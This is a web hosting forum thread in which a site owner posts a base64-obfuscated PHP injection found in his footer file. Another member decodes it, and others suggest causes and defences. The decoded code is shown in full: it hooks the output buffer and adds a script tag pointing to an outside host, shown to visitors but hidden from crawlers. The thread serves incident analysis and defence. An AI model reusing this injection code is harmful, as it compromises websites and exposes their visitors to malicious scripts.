hosted by liquidweb


Go Back   Web Hosting Talk : Web Hosting Main Forums : Programming Discussion : my site hacked by following php code
Reply

Forum Jump

my site hacked by following php code

Reply Post New Thread In Programming Discussion Subscription
 
Send news tip View All Posts Thread Tools Search this Thread Display Modes
  #1  
Old
Newbie
 
Join Date: May 2009
Posts: 9

my site hacked by following php code


some hacker insert the following code to my footer.php
and AVG tell me that threat. Thanks AVG.
Code:
<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5cGJtUmxjMmxuYm5OMGRXUnBiMmx1Wm04dVkyOXRMMnh6TG5Cb2NDSStQQzl6WTNKcGNIUSsiKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>
AVG tell me the threat:
http://www1.firesavez5.com/?p=p52dcW...iaiglnOdmps%3D

I find that code and deleted it from my file. But I don't know how the hacker insert to my php file?

Thanks,
Lei


Last edited by bear; 05-07-2010 at 09:55 AM.


Sponsored Links
  #2  
Old
Web Hosting Master
 
Join Date: Oct 2009
Posts: 816
Hard to say without more background information. It could be due to weak security on a shared hosting server, a compromised server, or a weakness in your web applications.

Just for fun, here's that chunk decoded and cleaned up somewhat.

Code:
if(function_exists('ob_start') && !isset($GLOBALS['mr_no'])) {
	$GLOBALS['mr_no']=1;

	if(!function_exists('mrobh')) {
		if(!function_exists('gml')) {
		 function gml() {
		  if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot") && (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))) {
		   return '<script src="http://indesignstudioinfo.com/ls.php"></script>';
		  }

		  return "";
		 }
		}

		if(!function_exists('gzdecode')) {
		 function gzdecode($var1) {
		  $var3=@ord(@substr($var1,3,1));
		  $var2=10;

		  if($var3&4) {
		   $var4=@unpack('v',substr($var1,10,2));
		   $var4=$var4[1];
		   $var2+=2+$var4;
		  }

		  if($var3&8) {
		   $var2=@strpos($var1,chr(0),$var2)+1;
		  }

		  if($var3&16) {
		   $var2=@strpos($var1,chr(0),$var2)+1;
		  }

		  if($var3&2) {
		   $var2+=2;
		  }

		  $var5=@gzinflate(@substr($var1,$var2));

		  if($var5===FALSE) {
		   $var5=$var1;
		  }

		  return $var5;
		 }
		}

		function mrobh($var6) {
		 Header('Content-Encoding: none');
		 $var7=gzdecode($var6);

		 if(preg_match('/\<\/body/si',$var7)) {
		  return preg_replace('/(\<\/body[^\>]*\>)/si', gml()."\n".'$1', $var7);
		 } else {
		  return $var7.gml();
		 }
		}

		ob_start('mrobh');
	}
}
It's basically using an output buffer to capture the generated page, then injects an external script before the <body> tag.

  #3  
Old
New Member
 
Join Date: May 2010
Posts: 1
Lei,

Same thing happened to me today. Every single PHP file on my server had that same line of code entered in it. I'm not sure how it happened or how to prevent it from happening again.

Garret

Sponsored Links
  #4  
Old
Newbie
 
Join Date: Oct 2004
Posts: 13
I'm sure there are several approached to getting this done, I'm no expert in this, but one of my "clients" had this problem and each time he removed it it was back the next day.
It turned out that when I went over his folders and files and set the correct permissions the problem stopped. For more info have a look at http://en.wikipedia.org/wiki/Chmod

__________________
Adtug.com

  #5  
Old
Web Hosting Guru
 
Join Date: Nov 2005
Posts: 268
chmod is only protecting files from being modified by whatever method is being used. it isnt actually plugging the security vunerability that allowed it in the first place. Also chmod wont help you if your script is vunerable to injection by itself (and the permission the script is running under has write access), unless you set the files to read/execute only.

Ideally shared hosting enviroments should not allow users to modify other files on the server outside of their root path, if this is not the case trouble your host to correct it. If they arnt locked out of other users directories it will be possible for them to do possibly more things than inject a snippit of code into a php script, including obtaining usernames and passwords to your database stored in plaintext configuration files.

  #6  
Old
Newbie
 
Join Date: Oct 2004
Posts: 13
Thank you for clearing that up...

__________________
Adtug.com

  #7  
Old
Newbie
 
Join Date: Apr 2010
Posts: 25
The most common method I have seen is the FTP credentials becoming compromised. This can be through brute force, especially with the commonly weak passwords most people use, or just through poor credential management (do you have yours on a sticky note attached to your monitor?). Make sure you approach the host about this issue and have *all* of your credentials changed, including FTP, shell access, control panel, etc. Any method configured for you to access the server should be updated with new credentials. Then go back through your content and remove the scripting.

  #8  
Old
Newbie
 
Join Date: May 2009
Posts: 9

  #9  
Old
Web Hosting Master
 
Join Date: Oct 2009
Posts: 816
chmod will only help you if you're on a weakly secured shared hosting server, in the sense that it can stop other people on the server from changing your files. But if your host doesn't work with the files being owned by your own account, other people will still be able to read them, and extract things like database credentials which they can then use to access your database.

It's a jungle out there.

  #10  
Old
Junior Guru
 
Join Date: May 2010
Location: Online
Posts: 233
Samething happened for one of my clients , each file of his wordpress instalaltion got that dumb in side at the begining , we found a php script that clean up all files and also remove empty lines
tutorialsbay.com/wordpress-hacked-malware-redirect/

  #11  
Old
Newbie
 
Join Date: Jan 2010
Location: London
Posts: 10
Possibly a PHP Shell?

  #12  
Old
New Member
 
Join Date: Jun 2010
Posts: 1
I think this is weak security of file manager or picture manager plugins in wysiwyg editors like TinyMCE
here is our case in old Mambo CMS installation
lampwebdevelopers.com/199/web-developement/security-and-anti-spam/website-hack-through-tinymce-filemanager-plugin/

  #13  
Old
Disabled
 
Join Date: Apr 2009
Posts: 3,255
Make sure you ask your host to update your cPanel and PHP/MYSQL. Make sure that you update your PHP scripts as well. A lot of hosts probably don't follow the proper procedures in security as well unfortunately from what I have seen. As always, backup your site every week at least.

  #14  
Old
Newbie
 
Join Date: Oct 2010
Posts: 5
The people who create this code and hack it onto people's site are the most despicable of all internet criminals.

I believe I have a simple solution to this problem, at least to stop this scum from hurting your customers.

Their script finds every PHP file and prepends a chunk of PHP.

So use that against them. Include in every page as you would functions of a config file. If it's not in the same directory as your index file, obviously change the code to fit.

HTML Code:
<?php

# this file should be less than 570 chars in length

$expected=570; 

$data=file_get_contents(__FILE__);

//echo strlen($data);

if (strlen($data)>$expected)
{
	//mail('youremail','Website compromised '.$_SERVER['HTTP_HOST'],'taken offline','FROM: youremail');
	if (!file_exists('index.phpx')) rename('index.php','index.phpx');
	// write this despite the existance of index.phpx in case they strike again
	$fh = fopen('index.php', 'w') or die("can't open file");
	fwrite($fh, 'Sorry, we are currently offline');
	fclose($fh);
}


?>

  #15  
Old
Aspiring Evangelist
 
Join Date: Aug 2009
Location: United Kingdom
Posts: 388
You can infect every page on a website with a PHP shell if they haven't secured PHP

Reply

Similar Threads
Thread Thread Starter Forum Replies Last Post
Hacked; Warning: count.php?o=2 code mifbody Hosting Security and Technology 30 07-31-2008 06:50 AM
How to show HTML and PHP code on a site? Eiolon Programming Discussion 11 10-18-2007 09:20 AM
Site Hacked via php script placed in WordPress Uploads directory cnymike Hosting Security and Technology 8 04-08-2007 08:38 AM
PHP/MYSQL Trivia site code job mrsam Employment / Job Offers 2 11-26-2005 03:30 PM
Code my Teen Site in PHP and MYSQL. TeenGab.com Employment / Job Offers 3 08-22-2005 04:27 AM

Related posts from TheWhir.com
Title Type Date Posted
Web Host Code Spaces Closes Shop After Hacker Deletes Customer Data Web Hosting News 2014-06-19 16:34:41
WiredTree Listing 2014-12-10 12:45:46
Could Website Hackers be Chasing Hosting Customers Away? Blog 2013-08-27 09:07:42
Syrian Electronic Army Targets Top US Media Websites in Outbrain Platform Hack Web Hosting News 2013-08-16 10:46:10
Apache Malware Darkleech Spreads Rapidly with Increase in Attacks Web Hosting News 2013-07-03 12:11:03


Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes
Postbit Selector

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off

Forum Jump
Login:
Log in with your username and password
Username:
Password:



Forgot Password?
WHT Host Brief Email:

We respect your privacy. We will never sell, rent, or give away your address to any outside party, ever.

Advertisement:
Web Hosting News:
WHT Membership
WHT Membership



 

X

Welcome to WebHostingTalk.com

Create your username to jump into the discussion!

WebHostingTalk.com is the largest, most influentual web hosting community on the Internet. Join us by filling in the form below.


(4 digit year)

Already a member?